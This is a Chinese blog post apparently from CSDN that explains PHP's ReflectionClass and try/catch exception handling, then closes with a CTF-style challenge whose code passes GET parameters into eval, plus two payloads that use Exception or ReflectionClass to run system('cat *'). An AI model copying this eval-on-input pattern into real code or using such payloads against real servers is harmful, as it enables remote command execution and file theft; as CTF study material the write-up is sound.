PHP反射类ReflectionClass、异常处理Exception

PHP的反射类ReflectionClass、ReflectionMethod

什么是php反射类,顾名思义,可以理解为一个类的映射。

官方文档里有很多可以调用的方法,我们可以通过这些方法获得一个类的属性、方法等信息。

在这里插入图片描述

使用getMethods(),获取fuc类的方法信息:

<?php 

class fuc{ //定义一个类
	public $a;
	public $b;
	function hello(){
		echo 'welcome';
	}
	function flag(){
		echo 'flag{you get a flag}';
	}

}
$class =new ReflectionClass('fuc'); //建立fuc这个类的反射类
var_dump($class->getMethods());
?>

image-20201109203909904

调用newInstance()来实例化fuc类,然后调用fuc类的函数flag

$class=new ReflectionClass('fuc'); //建立 fuc这个类的反射类
$fuc=$class->newInstance();//实例化 fuc 类
$fuc->flag();

image-20201109204202906

PHP异常处理 Exception

用法的个人理解:先执行try里面的代码,如果有错误就用exception抛出一个错误,然后通过catch捕捉错误信息

例子:

<?php
// 创建一个有异常处理的函数
function checkNum($number)
{
    if($number>1)
    {
        throw new Exception("变量值必须小于等于 1");
    }
        return true;
}
    
// 在 try 块 触发异常
try
{
    checkNum(2);
    // 如果抛出异常,以下文本不会输出
    echo '如果输出该内容,说明 $number 变量';
}
// 捕获异常
catch(Exception $e)
{
    echo 'Message: ' .$e->getMessage();
}
?>

上面代码将得到类似这样一个错误:Message: 变量值必须小于等于 1

实例解释:

上面的代码抛出了一个异常,并捕获了它:

1,创建 checkNum() 函数。它检测数字是否大于 1。如果是,则抛出一个异常。
2,在 “try” 代码块中调用 checkNum() 函数。
3,checkNum() 函数中的异常被抛出。
4,“catch” 代码块接收到该异常,并创建一个包含异常信息的对象 ($e)。
5,通过从这个 exception 对象调用 $e->getMessage(),输出来自该异常的错误消息。

然而,为了遵循 “每个 throw 必须对应一个 catch” 的原则,可以设置一个顶层的异常处理器来处理漏掉的错误。

题目

<?php
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
            eval("echo new $v1($v2());");
    }

}

?> 

payload:

?v1=Exception&v2=system('cat *')

?v1=Reflectionclass&v2=system('cat *')

参考文章:

https://blog.csdn.net/qq_44657899/article/details/109558430

😕/blog.csdn.net/qq_44657899/article/details/109558430](https://blog.csdn.net/qq_44657899/article/details/109558430)

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值